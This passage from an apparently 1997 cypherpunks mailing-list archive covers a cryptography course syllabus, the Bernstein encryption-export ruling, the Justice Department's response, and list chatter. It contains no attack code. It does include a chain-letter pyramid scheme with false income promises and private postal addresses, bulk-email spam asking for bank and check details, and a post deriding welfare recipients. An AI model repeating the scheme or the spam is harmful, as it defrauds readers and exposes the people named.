are described. The public key schemes RSA, ElGamal, and elliptic curve crypto systems are developed. As important tools for authentication and integrity, digital signatures and hash functions are introduced. Advanced protocols for key distribution in networks are developed. Identification schemes are treated as advanced topics. Some mathematical algorithms for attacking cryptographic schemes are discussed. Application examples will include a protocol for security in a LAN and identification with smart cards. Special consideration will be given to schemes which are relevant for network environments. For all schemes, implementation aspects and up-to-date security estimations will be discussed. PREREQUISITES Working knowledge of ``C''. An interest in discrete mathematics and algorithms is highly desirable. TEXTBOOK D.R. Stinson, Cryptography: Theory and Practice. CRC Press, 1995 (mandatory) B. Schneier, Applied Cryptography. 2nd edition, Wiley & Sons, 1996 (recommended for additional reading) SYLLABUS EE 578/CS 578 An important part of the course is an independent project. The project topic can freely be chosen by the student. Possible topics include (but are not limited to) implementation of a real-size cryptographic algorithm or protocol, a literature study on new cryptographic schemes or on legal aspects of cryptography, or implementation of an algorithm for attacking a cryptographic scheme. WEEK 1: Introduction: Principals of cryptography. Classical algorithms. Attacks on cryptographic systems. WEEK 2: Stream ciphers and pseudo-random generators.. Some information theoretical results on cryptography. WEEK 3: Private key cryptography: The Data Encryption Standard DES. Brief history, function and performance. WEEK 4: Private key cryptography: Recent results on successful attacks on DES. Operation modes of symmetric ciphers. IDEA and other alternatives to DES. WEEK 5: Public key cryptography: Introduction. Some Number Theory and Algebra. WEEK 6: Public key cryptography: RSA. Function and security. Recent results on successful attacks on RSA. WEEK 7: Midterm exam. WEEK 8: Public key cryptography: The discrete logarithm problem. ElGamal crypto system. Function and security. Security estimations. WEEK 9: Public key cryptography: Elliptic curve systems. Mathematical background, function and security. WEEK 10: Digital Signatures: The ElGamal signature scheme. Message Authentication Codes (MAC). WEEK 11: Hash functions: Principals. Block cipher based hash functions. Protocols: Attacks against protocols, protocols for privacy, authentication, and integrity. WEEK 12: Key distribution in networks: Private key approaches, certificates, and authenticated key agreement. WEEK 13: Identification schemes: Challenge-and-response protocols. The Schnorr identification scheme for smart cards. WEEK 14: Final exam. ****************************************************************************** Christof Paar http://ee.wpi.edu/People/faculty/cxp.html Assistant Professor email: christof at ece.wpi.edu ECE Department phone: (508) 831 5061 Worcester Polytechnic Institute fax: (508) 831 5491 100 Institute Road Worcester, MA 01609, USA ****************************************************************************** For help on using this list (especially unsubscribing), send a message to "dcsb-request at ai.mit.edu" with one line of text: "help". --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From JonWienk at ix.netcom.com Mon Aug 25 17:46:04 1997 From: JonWienk at ix.netcom.com (Jonathan Wienke) Date: Tue, 26 Aug 1997 08:46:04 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: Message-ID: <3.0.2.32.19970825172215.00698ba0@popd.netcruiser> >The majority on increased crime from the Welfare leaches could >be handled with a $200 shotgun and a $0.50 Deer Slug. Having had direct experience with a few of said welfare leeches, this is the course I have taken. Winchester makes an excellent pump shotgun, the 1300 Defender model, which (last time I checked) lists for $196 at Wal-Mart. Mine has a 7-round magazine and an 18" barrel. (I'm not sure if the 7-round model is still available--I purchased mine just prior to passage of Klinton's Krime Bull.) With a tactical flashlight mounted under the barrel (with the power switch mounted in the front grip) and a SideSaddle shell carrier mounted to the reciever, one has the capability to effectively deal with rude strangers invading one's home. I will never foment trouble or provoke a fight, but anyone attempting to kill or injure myself or my family should ensure their health insurance covers lead poisoning. Jonathan Wienke What part of "the right of the people to keep and bear Arms, shall not be infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution) When everyone is armed, criminals fear everyone, not just the police. PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1 3A8F 778A 7407 2928 DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA 4878 C245 D245 EAA7 0DCC Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred. US/Canadian Windows 95/NT or Mac users: Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/ Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html Commercial version of PGP 5.0 and related products at http://www.pgp.com Eudora Light + PGP = Free, Convenient Communication Privacy From jya at pipeline.com Mon Aug 25 17:49:35 1997 From: jya at pipeline.com (John Young) Date: Tue, 26 Aug 1997 08:49:35 +0800 Subject: Forbes article on Financial Cryptography is coming Message-ID: <1.5.4.32.19970826002513.00851318@pop.pipeline.com> All right! Congrats to all. Hail, to Sameer the Overthrower. And to Adam Shostack, now daily distinguished bullseye spit-eye at bug-eyed authority. Hettinga and Greenspan, assuring the end of greenbacks, uh huh. From gnu at toad.com Tue Aug 26 10:37:38 1997 From: gnu at toad.com (John Gilmore) Date: Tue, 26 Aug 1997 10:37:38 -0700 (PDT) Subject: Crypto Export Restrictions are Unconstitutional Message-ID: <199708261734.KAA06596@toad.com> CRYPTO EXPORT RESTRICTIONS ARE UNCONSTITUTIONAL Professor Bernstein is free to publish his software San Francisco, August 26, 1997 - The Federal District Court here struck down Commerce Department export restrictions on the privacy technology called encryption yesterday, concluding that "the encryption regulations are an unconstitutional prior restraint in violation of the First Amendment." For the first time, Judge Marilyn Hall Patel ordered the government not to prosecute or harass the plaintiff, Professor Daniel Bernstein, and those who use or publish his encryption software. The decision knocks out a major part of the Clinton Administration's effort to force companies to design government surveillance into computers, telephones, and consumer electronics. "This is wonderful news," said Prof. Bernstein. "I hope I can get some of my ideas published before they change the law again." The decision is a victory for free speech, academic freedom, human rights, and the prevention of crime. American scientists and engineers will now be free to collaborate with others in the United States and in foreign countries. This will enable them to build a new generation of tools for protecting the privacy and security of our communications. "Once again, it took a federal court to sort out technology and the Constitution," said Lori Fena, Executive Director of the Electronic Frontier Foundation, which backed the suit. "Let this decision signal the other two branches of government that when making laws pertaining to the Internet, they must honor their oaths to uphold the Constitution." The decision is strategic because the Clinton Administration has been using the export restrictions to influence domestic privacy policy. Companies that agree to build "key recovery" technology into their products are exempt from most of the restrictions. Key recovery, a follow-on to the Clipper Chip, is designed to give the government untraceable access to users' private information. The Federal District Court of the Northern District of California last December struck down the ITAR, a set of encryption restrictions enforced by the State Department. A few weeks later, the Government created virtually identical restrictions in the Commerce Department's Bureau of Export Administration (BXA). Yesterday's decision invalidates the new restrictions, stating, "the encryption regulations issued by the BXA appear to be even less friendly to speech interests than the ITAR." She warns that "the government cannot avoid the constitutional deficiencies of its regulations by rotating oversight of them from department to department," though concluding that she "does not believe that such was the intent here." "Our right to create, use, and deploy encryption come from our basic civil rights of free speech, freedom of the press, freedom from arbitrary search, due process of law, and privacy. Judge Patel has affirmed those roots in the First Amendment," philosophizes John Gilmore, Electronic Frontier Foundation co-founder. "Our Founding Fathers used encryption -- and even invented some -- and did not intend any ``crypto exceptions'' to the Bill of Rights." DETAILS OF MONDAY'S DECISION In the heart of the ruling, "The court declares that the Export Administration Regulations . . . insofar as they apply to or require licensing for encryption and decryption software and related devices and technology, are in violation of the First Amendment on the grounds of prior restraint and are, therefore, unconstitutional as discussed above, and shall not be applied to plaintiff's publishing of such items, including scientific papers, algorithms or computer programs." The Court also held that the government's licensing procedure fails to provide adequate procedural safeguards. When the Government acts legally to suppress protected speech, it must reduce the chance of illegal censorship by the bureacrats involved, for example by making the government go to a judge to decide the issue. The EAR does not require this; in fact, it precludes it. "And most important, and most lacking, are any standards for deciding an application. The EAR reviews applications for licenses ``on a case-by-case basis'' and appears to impose no limits on agency discretion." The Court dissected the export controls' exemption for printed materials at length, calling it "so irrational and administratively unreliable that it may well serve to only exacerbate the potential for self-censorship." The government's "distinction between paper and electronic publication . . . makes little or no sense and is untenable." The Court not only declared that these regulations are invalid and unenforceable, but also prevented the Government from "threatening, detaining, prosecuting, discouraging, or otherwise interfering with plaintiff or any other person described . . . above in the exercise of their federal constitutional rights as declared in this order." The immediate effect of this decision is that Prof. Bernstein may publish his encryption software, and that others may read, use, publish and review it. In addition, others in industry are studying the court's analysis, and might decide to publish their own software on the Internet as well. Pretty Good Privacy, Inc, is one such company, which believes that future courts will find Judge Patel's reasoning persuasive. "We are particularly pleased the court has reconfirmed that computer programs, like other literary works, are accorded full protection under the First Amendment," said Bob Kohn, vice president and general counsel for Pretty Good Privacy. The final form of the judgment will be negotiated between the parties, and presented to the court within a week. The government could either seek an emergency appeal of the injunction, or take up to 60 days from the entry of judgment to appeal. ABOUT THE ATTORNEYS Lead counsel on the case is Cindy Cohn of the San Mateo law firm of McGlashan & Sarrail, who is offering her services pro bono. Major additional legal assistance is being provided by Shari Steele of the Electronic Frontier Foundation; Lee Tien of Berkeley; James Wheaton and Elizabeth Pritzker of the First Amendment Project in Oakland; and Robert Corn-Revere of the Washington, DC, law firm of Hogan & Hartson. ABOUT THE ELECTRONIC FRONTIER FOUNDATION The Electronic Frontier Foundation (EFF) is a nonprofit civil liberties organization working in the public interest to protect privacy, free expression, and access to online resources and information. EFF is a primary sponsor of the Bernstein case. EFF helped to find Bernstein pro bono counsel, is a member of the Bernstein legal team, and helped to collect members of the academic community and computer industry to support this case. Full text of the lawsuit and other paperwork filed in the case is available from EFF's online archives at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Scanned images of Monday's decision are available at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Legal/970825_decision.images/ The full text of Monday's decision will soon be available at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Legal/970825.decision Professor Daniel Bernstein will be building his new Constitutionally- protected cryptography web page at: http://pobox.com/~djb/crypto.html Electronic Frontier Foundation Contacts: Shari Steele, Staff Attorney 301/375-8856, ssteele at eff.org John Gilmore, Founding Board Member 541/354-6541, gnu at toad.com Cindy Cohn, McGlashan & Sarrail 415/341-2585, cindy at mcglashan.com From helledge at oilfieldtrash.com Tue Aug 26 11:49:38 1997 From: helledge at oilfieldtrash.com (helledge at oilfieldtrash.com) Date: Tue, 26 Aug 1997 11:49:38 -0700 (PDT) Subject: Quick Money Message-ID: <199708261853.OAA17317@rapidconnect.com> /////////////////////////////////////////////////////////////////////////////// This Message was Composed using Extractor Pro Bulk E- Mail Software. If you wish to be removed from this advertiser's future mailings, please reply with the subject "Remove" and this software will automatically block you from their future mailings. //////////////////////////////////////////////////////////////////////////////// Dear Internet Friend, I couldn't resist this one. Hey what could be easier and for such a great cause. It's only $5 bucks and really nothing to it !! My $5 is already in the mail. Don't wait to read this !! It's short to read, easy to do, and MONEY in your mail box PRONTO !!! >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> THIS IS THE FAST ONE WHILE YOU'RE WAITING FOR THE OTHERS TO WORK. YOU CAN HAVE $7,000 IN TWO WEEKS WITH ONLY $5 TOTAL COST, AND ONE HOUR OF YOUR TIME. If you want to make a few thousand dollars really quickly, then please take a moment to read and understand this fast program I am sharing with you. No, it is NOT what you think. YOU DO NOT have to send $5.00 to five people to buy a report, recipe or get on their mailing list. Nor will you need to invest more money later to get things going. THIS IS THE FASTEST, EASIEST PROGRAM you will ever be able to do. Complete it in ONE HOUR and you will never forget the day you first received it. If you are doing other programs, by all means stay with them. The more the merrier. But, PLEASE READ ON! First of all, there are only THREE LEVELS, not four, five or six like many other programs. This three-level program is more realistic and much, much faster. Because it is so easy, the response rate for this program is VERY HIGH and VERY FAST, and you receive your reward in about FOURTEEN DAYS. That's only TWO WEEKS ~ not three months. Just in time to pay next months bills! TRUE STORY Cindy Allen tells how she ran this program four times last year. The first time, she received $3,000 in cash in two weeks, and then $7,000 in cash the next three times. When this MLM is continued as it should be, EVERYONE PROFITS!!! Don't be afraid to make gifts to strangers: they will come back to you ten fold. All of us have uses for our hard-earned money, but most of us have very little left after we pay the bills. THIS CAN DO IT FOR YOU!!!! HERE ARE THE DETAILS You only send 25 copies (not 200 or more as in other programs). You should send them to PEOPLE WHO SEND YOU THEIR PROGRAM, because they are already believers, and your program is BETTER AND FASTER. Even if you are already in a program, continue, stay with it, but do yourself a favor and DO THIS ONE as well. RIGHT NOW!!! It is simple and takes a very small investment, not hundreds of dollars. It will pay you before your other programs begin to trickle in!!!! JUST GIVE ONE PERSON $5.00. That's it! That's all! Follow the simple instructions, and in TWO WEEKS, you can have at least $7,000 because most PEOPLE WILL RESPOND due to the LOW INVESTMENT, SPEED and HIGH PROFIT POTENTIAL. We are not even figuring a 50% response rate! That would be a $10,000 return. REALLY! So let's all keep it going, and help each other in these tough times. 1. On a blank sheet of paper, write down "DO UNTO OTHERS AS YOU WOULD HAVE THEM DO UNTO YOU" " HERE IS YOUR GIFT" clearly and fold it around a FIVE DOLLAR BILL. Send this to the FIRST NAME on the list. ONLY THE FIRST PERSON ON THE LIST GETS YOUR FIVE DOLLAR GIFT. 2. Remove the FIRST (#1) name from the list. Move the other two names up and add YOUR NAME to the list in the third (#3) position. 3. Now Email this letter with your name in the third position on it to 20 people or more who Email your their programs! Send it to your friends on the net but do it right away. It's so easy. Don't mull it over. ONE HOUR. THAT'S IT! THERE IS NO MORE TO DO. When your name reaches the first position in a few hours (!), it will be your turn to collect your gifts. The gifts will be sent to you by over 1500 to 2000 people like yourself who are willing to invest $5.00 and an hour to receive $7,000 in cash. Your entire investment is the $5.00 you sent to name #1. That's all!! There could be $7,000 in $5.00 bills in your mailbox within two weeks. CONSIDER THAT!!!!! CAN I DO IT AGAIN? OF COURSE...... Some people may want only to send this letter to friends in their news groups while others may choose to reply to all Internet offers via e-mail with THIS LETTER. That's fine: you can if you want. THINK ABOUT THAT!!! The sky really is the limit with this unique "GIFTING CLUB"! 50%! Not interested? C'mon! Isn't the prospect of an easy $7,000 to $10,000 in TWO WEEKS worth alittle experimentation? One hour of your time and $5.00. Hmmmm!!! ACT FAST AND GET MONEY FAST!!!!! HONESTY AND INTEGRITY MAKE THIS PLAN WORK. COPY THE NAMES CAREFULLY AND SEND $5.00 TO THE FIRST NAME TODAY. DO UNTO OTHERS, AS YOU WOULD HAVE OTHERS DO UNTO YOU. PEOPLE HELPING OTHER PEOPLE. #1 David Ciup 3745 Glendon Ave.#101 Los Angeles, CA 90034-6220 USA #2 Shane Pye Box 64 Danville WA 99121-0064 #3 Harold W. Elledge P.O. Box 429 Bloomfield, NM 87413 Pretty wild world these days, eh !! "Good Luck" !! --------------------------------------- From camcc at abraxis.com Tue Aug 26 14:57:58 1997 From: camcc at abraxis.com (Alec McCrackin) Date: Tue, 26 Aug 1997 14:57:58 -0700 (PDT) Subject: Need this? Why not? Message-ID: <3.0.2.32.19970826180010.00812c20@smtp1.abraxis.com> :: Request-Remailing-To: Adam, Quoted from PGP Users mail: Check on the pgp-users web page (http://pgp.rivertown.net) for information on all types of remailers, both under pgp-links and remailer-info. BTW did you see that shit-for-brains Toto has been posting (intentionally?) misinformation on the "CC: Trojan" effort. I seen he has dragged you into the light--going so far as to suggest you be fucked to death by his succubus crytotart. He screwed up and posted a message to me to the list! He claims to be "field testing" the CC: machine and rerouting mail. Too much booze in my opinion. "Bad, mad, and dangerous to know." XO Alec From catalog at enforcement.net Tue Aug 26 15:46:49 1997 From: catalog at enforcement.net (catalog at enforcement.net) Date: Tue, 26 Aug 1997 15:46:49 -0700 (PDT) Subject: Law Enforcement Products, Badges, Patches and ID Products Message-ID: <199708261335.BUG5354@enforcement.net> Free Catalog NIC Law Enforcement Supply http://www.nic-inc.com Bail Enforcement / Fugitive Recovery Agent Private Investigators Security Companys Law Enforcement Novelity and collectors items. KGB, CIA & Military Novelity & Collectors Items. Custom ID and Camoflouge ID products. Badges, Patches,Hats, Shirts, ID Products, Novelities. Weapons books, Training books, Novelity books http://www.nic-inc.com From Karen at aol.com Tue Aug 26 17:30:47 1997 From: Karen at aol.com (Karen at aol.com) Date: Tue, 26 Aug 1997 17:30:47 -0700 (PDT) Subject: Hi! Message-ID: <687905688220Tyy93756@AOL.com> Ladies & Gents. Have you found the right on-line relationship yet? We have assisted literally thousands of people like yourself find that special on-line relationship of their circuit dreams. Our program is very unique. You tell us what your interests are, and the type of person that you want to meet. From this we can match you with people of the same interests and hobbies. Our database lists thousands of members, which we can match you with. This is a lifetime membership. You can start and stop as often as you like. Some want several relationships. Others want just one real serious relationship. It is all up to you. A lot of these relationships have gone way past the keyboard. Everything is completely confidential. We let you and the other party know that we have matched you and your interests. If both agree then we exchange Screen names or E-mail address for you. Our lifetime membership is usually $69.95. Because of the overwhelming response we are glad to offer you for one week only a lifetime membership for only $29.95. Once we receive your application, Our staff will get to work on it right away. You can be in a new relationship in as little as one week. Your happiness is our first priority. We want you to tell your friends. All you need to do to get started is to fill out the application at the bottom of the screen and mail it in with a check or money order to the address below. Remember to let us know when you want us to stop sending you information on other members. Thanks ahead for your order. Screen name: or E-mail address: ___________________________ City or Area you are from: _________________________________ Hobbies: ______________________________________________ Interests: ________________________________________________ Sex MorF: ______________ Age : _____________ In your own words tell us the type of person that you would be interested in. List things such as sex, age, interests, and hobbies. The more information that you give us, the easier it will be to find a match. Remember we have thousands of members all over the world. You will need to let us know if you would care for a long distance relationship. Note: We will handle correspondence with you by E-mail, unless you say otherwise. What type of person interests you? _______________________________________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ If we have any questions about your application, our staff may e-mail you with a question If you are not completely happy with-in 30 days we will refund 100% of your money! Mail information above and check or money order for $29.95 to: Delcom C/O Cyber Connections P.O. Box 916 Walnut Cove, NC. 27052 Thanks again! ----------------------- Headers -------------------------------- Received: from mrin39.mail.aol.com (mrin39.mail.aol.com [152.163.116.77]) by mrin37.mx.aol.com with SMTP; Fri, 15 Aug 1997 18:20:03 -0400 Received: from ha1.aol.net (ha1.aol.net [217.172.0.60]) by mrin39.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0) with ESMTP id SAA116545; Fri, 15 Aug 1997 18:19:56 -0400 (EDT) Received: from mail.aol.net (s5.aol.com [217.182.57.5]) by ha1.aol.net (aol*NET 2.1.0) with SMTP id SAA11112; Fri, 15 Aug 1997 18:19:50 -0400 (EDT) From: Delcon at Aol.com Received: from Mailhost.AOL.COM by Danny365 at Aol.com (8.8.5/8.6.5) with SMTP id QGT64522 for ; Fri, 15 Aug 1997 18:19:50 -0600 (EST) Date: Fri, 15 Aug 97 18:19:50 EST To: Tdave at juno.com Subject: Members at aol.com Message-ID: <187548889994 Hrr64973 at AOL.com> Reply-To: Mailhost.Member at Aol.com X-UIDL: 58585858585858585858585858585845 Comments: Authenticated sender is From kohn at pgp.com Tue Aug 26 19:42:38 1997 From: kohn at pgp.com (Bob Kohn) Date: Tue, 26 Aug 1997 19:42:38 -0700 (PDT) Subject: Crypto Export Restrictions are Unconstitutional In-Reply-To: <199708261734.KAA06596@toad.com> Message-ID: <3.0.2.32.19970826192502.0386b1e4@mail.pgp.com> A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 915 bytes Desc: not available URL: From gnu at toad.com Tue Aug 26 19:57:37 1997 From: gnu at toad.com (John Gilmore) Date: Tue, 26 Aug 1997 19:57:37 -0700 (PDT) Subject: DoJ press release on Bernstein case Message-ID: <199708270251.TAA15101@toad.com> Forwarded-by: Shari Steele Department of Justice For Immediate Release Tuesday, August 26, 1997 CIV (202) 616-2777 TDD (202) 514-1888 JUSTICE DEPARTMENT STILL REVIEWING DISTRICT COURT DECISION ON EXPORT CONTROLS ON ENCRYPTION SOFTWARE WASHINGTON, D.C. -- The Justice Department said today it is considering what further legal measures it will take following yesterday's ruling by the U.S. District Court in San Francisco that certain aspects of the government's regulations on the export of encryption software are unconstitutional. Another federal court upheld the export controls on encryption software. The Administration is committed to promoting the legitimate use of encryption. Through encryption--or the coding of messages--businesses can protect trade secrets, hospitals can safeguard medical records, and individuals can be assured that personal messages on the information superhighway remain private. But, as President Clinton stated upon issuing an Executive Order on this subject on November 15, 1996, the use of encryption products by unfriendly parties outside the United States can jeopardize the foreign policy and national security interests of the United States, and public safety of U.S. citizens. Judicial proceedings in Bernstein v. Department of State are not yet concluded, and the decision governs only that case. In March 1996, in another pending case in Washington, D.C., Karn v. Department of State, the District Court ruled that export controls on encryption software are constitutional under the First Amendment and serve important interests of the United States. That case is still pending to consider export controls on encryption now administered by the Commerce Department. Until this issue is resolved, export controls on encryption software remain in place. Individuals or companies wishing to export encryption software by any means must continue to adhere to applicable export licensing controls on such software before exporting it abroad. ### 97-351 From brad at yielding.com Tue Aug 26 20:24:23 1997 From: brad at yielding.com (brad at yielding.com) Date: Tue, 26 Aug 1997 20:24:23 -0700 (PDT) Subject: Broadcast Email Friendly Mailing & Web Hosting Message-ID: <1873645398.3647564@86756476.com>

Finally, EVERYTHING you need to REALLY market your business 
on the Internet.

* Broadcast EMAIL FRIENDLY web hosting!
* Broadcast EMAIL FRIENDLY Service Provider!
* Broadcast EMAIL FRIENDLY consulting!
* Fresh Up to Date E-mail Mailing Lists!
* Bulk E-mail Software!

PLUS

We can help you accept all forms of ELECTRONIC payments from your home or
business.  

If you've spent any time marketing on the Internet, 
you know that  in order to make any serious money
 you MUST send broadcast e-mail.  

Your online business survival depends on the quality and
consistency of your broadcast email.

You NEED to be able to market your products
and/or services cost  effectively.

Nothing has proven to be more cost effective
 than broadcast e-mail.
We can send it for you. 
________YES- mail my message to 500,000 responsive
 buyers for LESS THAN ONE U.S. DOLLAR
per thousand for a total of $359.95
_______YES-mail my message to 1,000,000 responsive
 buyers for  a  total of $659.95
________YES, mail my message to 2,000,000 responsive 
buyers for a total of $1199.95

Or,
We can make it affordable so You can send it yourself.
_____YES-  send me 100,000 email addresses for ONLY  $59.95
_____YES - send me 400,000 email addresses for ONLY  $229.95
Less than 22 cents per thousand
_____YES-  send me 1,000,000 email addresses for ONLY $399.95
Less than 17 cents per thousand.

Need information on broadcast email software
 to expedite mailing  these lists?
Give us a call - 213-737-1494

Even if you receive 1/10 of 1% response for mailing 
1,000,000 email addresses  you would receive 1000 replies!!!!  

How much money would you make?

Need your own server to mail from?
Give us a call - 213-737-1494

Prefer to send broadcast email  from our server?
(Allow 10 days account setup)
Total Account charges
Basic Server Use  $150.00 per month.
Total Due (1st & last):____________
Set-up Fee ($85)	____________
(allow 10 business days for account set-up)
Call today - 213-737-1494

WE ACCEPT ALL FORMS OF 
ELECTRONIC PAYMENT FOR YOUR CONVENIENCE
Credit Cards
Voice Check
Fax check
E-mail Check

Need broadcast email friendly web hosting?
Our Broadcast E-mail Friendly Web Sites Include:
Up to 1 Full Gigabyte of data transfer per day
Free Disk Storage up to 10 MB
1 Domain Name
Free POP 3 Account - additional accts are $10. each/month
Free Business E-mail address - additional addresses -
$5 each per month
Secure Server available
Unlimited E-mail aliases - $10 per month - $25. set up
Access via FTP or Telnet
Tech support by telephone or e-mail
Micrsoft Front Page support
Free Web Page Statistics
Convenient Site Modificatioon 24 hours per day.

Our Basic Website Hosting Package includes 
all the above for only $35. per month, with a $50. set up fee.
First & last month's rent due at set up.

Our Virtual Domain Website Hosting Package  includes 
all the above including your own virtual domain 
for only $45.00 per month with a  $85 setup plus
 Internic charges.

Let us help you create your own media company.

Put your sales message in front of millions of responsive buyers. 

Decide for yourself what works best for your online business.

Call 213-737-1494 to receive your end-user agreement 
by  fax or call  just to get up to speed on the possibilities. 

Or send an e-mail message to Realbusiness@

We've got what you need!

START YOUR COMPLETE INTERNET MARKETING PROGRAM TODAY!

 ORDER FORM
I an interested in:
Broadcast E-mail Friendly Web Hosting ________________
Basic ($35 per month) ____ Virtual ($45 per month) _____

Broadcast EMAIL FRIENDLY Service Provider __________
($150.00 per month, $85. setup)

Broadcast EMAIL FRIENDLY consulting _____________
(FREE initial consultation)

Fresh Up to Date E-mail Mailing Lists _____________
100,000 _______ 400,000 _____ 1,000,000 ________

Bulk E-mail Software _______________
(Call for Quote)

I would prefer Phoenix at Global Enterprises to handle my mailing
500,000 ____________
1,000,000 __________
2,000,000__________
Name____________________________________________
Address__________________________________________
City____________________State_______Zip___________
Email___________________________________________
Phone__________________________________________
Check Ordering Info:
Name (exactly as it appears on check)
_______________________________________
Check # _______________				
Dollar Amount	$________________
Telephone #__________________
Bank Name:_____________________
Bank Address ______________________________________________
Numbers at Bottom of Check(read from left to right, please indicate 
blank spaces with a space:
_______________________________________________









From primestar at home-business.net  Tue Aug 26 21:33:57 1997
From: primestar at home-business.net (primestar at home-business.net)
Date: Tue, 26 Aug 1997 21:33:57 -0700 (PDT)
Subject: You can take advantage of the biggest Technology shift in History
Message-ID: <199708262228.RDQ5650@home-business.net>


Ride the Digital Satellite Wave to Success!!!

You can take advantage of the biggest Technology shift in History and create 
an on going Income for life. $$$$$$$


For the first time in history the Average Person can profit from TV!

We Combine:
* Digital Satellite TV with No equipment to buy.
* Fortune 500 alliance.
* Internet services.
* Home Shopping.
* Private Success and Training Network Via Satellite.
* # 1 Rated Home Based Business.

20,000 People a Day are Switching to Digital Satellite TV!

Find out how you can Profit from being in the right place at the Right Time

The Window of Opportunity is NOW!!!!

Click here for instant info by email!
You'll be glad you did.




















From whgiii at amaranth.com Tue Aug 26 08:04:11 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 26 Aug 1997 23:04:11 +0800 Subject: There's something wrong when...Shitty Laws! In-Reply-To: <+u6M/NucrBPL5LOmnZJmew==@bureau42.ml.org> Message-ID: <199708261451.JAA12764@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <+u6M/NucrBPL5LOmnZJmew==@bureau42.ml.org>, on 08/26/97 at 02:12 PM, bureau42 Anonymous Remailer said: > After memorizing the Fertilizer Act and all other regulations and >legislation involved, I piled some turds in my yard, next to the garden. > It was a week later, when I began to follow the instructions to turn it >over and mix it up that I was arrested for "being involved in 'bad >shit'." >The worst part is that because I was turning it over and stirring it when >arrested, I will get an "extra five years" for "use of encryption in the >commision of a composting crime." Isn't socialism grand!!! :) - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNALffo9Co1n+aLhhAQG9iAP+MlacfZ0lkXJT2+zQu5KaoA+KY8os4Kbw QjfSrqAj5+mADjhE3S9DfTFvTGJqEcxa2ceKcbm6thOpAMZFzU1N9qk0EwVKFkFL xrK9aEMyhXb9nMynpYKMACTXcioU/jYVOi6+l0KBynwAccn5xSkbnSlYtUsoAzu5 5jl4hmQbM2I= =Pj07 -----END PGP SIGNATURE----- From sunder at brainlink.com Tue Aug 26 08:05:37 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 26 Aug 1997 23:05:37 +0800 Subject: heart In-Reply-To: Message-ID: On Tue, 26 Aug 1997, ? the Platypus {aka David Formosa} wrote: > > > On Mon, 25 Aug 1997, ? the platypus {aka David Formosa} wrote: > > [...Realy lame aregument on my part snipped...] > > What was I on when I wrote that crap!? Good question... I'd like to know where you got it so I can smoke some too... must be some good mind altering shit.... > But I have a better example :D > > I take a blood sample from our plunger wealding cop, its the blood of a > homospapian i.e. a human. > > The cop makes use of the plunger. > > I take a second sample from our plunger wealding cop, its the blood of a > homospapain i.e. a human. > > The cop can't become inhuman by any action thay take. How's that again? Earlier you were saying that if any human considers another human inhuman, all huamns lose humanity points, I showed an example whereby all of humankind's inhumans action (by your model) would calls all humanity - including the cop - to lose their humanity points to the point of having negative humanity points therefore being human. Why are cops an exception to this? OTOH: By your new example: If you now take a blood sample from the plungee, is he human as well? If so, then both the cop and the plungee are human, therefore neither has lost humanity points, and if someone else came with a chainsaw and cut the cop's head off, and you now take all three persons' blood, they all are human. Whether or not the chainsaw dude did it with malice and thought the cop inhuman, all three blood samples will still show human. So what's your point now? =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From declan at well.com Tue Aug 26 08:10:53 1997 From: declan at well.com (Declan McCullagh) Date: Tue, 26 Aug 1997 23:10:53 +0800 Subject: Internet Content Coal. bars press from "news rating" mtg on 8/28 Message-ID: ---------- Forwarded message ---------- Date: Tue, 26 Aug 1997 07:58:10 -0700 (PDT) From: Declan McCullagh To: fight-censorship-announce at vorlon.mit.edu Subject: Internet Content Coal. bars press from "news rating" mtg on 8/28 ---------- Forwarded message ---------- Date: Mon, 25 Aug 1997 17:53:24 -0400 From: Vin Crosbie Subject: ICC bars the press -- irony? Does anyone besides me find it both humorous and sad that this week's meeting of the Internet Content Coalition, during which it will likely discuss its proposal to rate or label which websites offer 'news', will be closed to the press? Does no one else find an unfortunate irony that editorial organizations such as MSNBC, CMP, Playboy, AdWeek, and C/NET are meeting behind closed doors to discuss their proposal about why or how to label or rate which websites are deemed to offer 'news'? After all, why bother discussing a controversial issue in public, in the light of day? Why should these editorial organizations live by the standard with which they judge others? Would they object if other groups or bodies were barring them from reporting on a meeting to discuss a proposal to rate or label whether they offer 'news' content? I think so. >"This is an off-the-record meeting, where New Media editors can discuss >openly and freely, and where we hope to reach a consensus on moving >forward. It is not open to the press," said James Kinsella, general manager of >MSNBC in an e-mail message. quotes Editor & Publisher magazine's website. 